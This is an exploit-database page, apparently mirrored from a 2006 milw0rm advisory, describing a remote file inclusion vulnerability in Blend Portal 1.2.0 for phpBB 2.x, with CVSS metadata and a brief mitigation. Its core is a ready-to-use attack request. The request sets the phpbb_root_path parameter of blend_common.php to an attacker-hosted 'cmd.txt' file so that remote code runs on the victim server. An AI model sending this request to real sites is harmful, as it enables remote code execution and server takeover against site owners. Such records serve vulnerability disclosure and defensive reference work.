header-logo
Suggest Exploit
vendor:
Blend Portal
by:
nukedx.com, milw0rm.com
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Blend Portal
Affected Version From: 1.2.2000
Affected Version To: 1.2.2000
Patch Exists: NO
Related CWE: N/A
CPE: a:blend_portal:blend_portal:1.2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: phpBB 2.x
2006

Blend Portal <= 1.2.0 for phpBB 2.x Remote File Inclusion Vulnerabilities

This exploits works on Blend Portal <= 1.2.0 for phpBB 2.x. Succesful exploitation needs register_globals on & allow url_fopen on. GET -> http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=[FILE]. EXAMPLE -> http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=http://yoursite.com/cmd.txt?

Mitigation:

Disable register_globals and allow url_fopen on the server.
Source

Exploit-DB raw data:

Blend Portal <= 1.2.0 for phpBB 2.x Remote File Inclusion Vulnerabilities
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on Blend Portal <= 1.2.0 for phpBB 2.x
Original advisory can be found at: http://www.nukedx.com/?viewdoc=41
Succesful exploitation needs register_globals on & allow url_fopen on
GET -> http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=[FILE]
EXAMPLE -> http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=http://yoursite.com/cmd.txt?
# nukedx.com [2006-05-28]

# milw0rm.com [2006-05-28]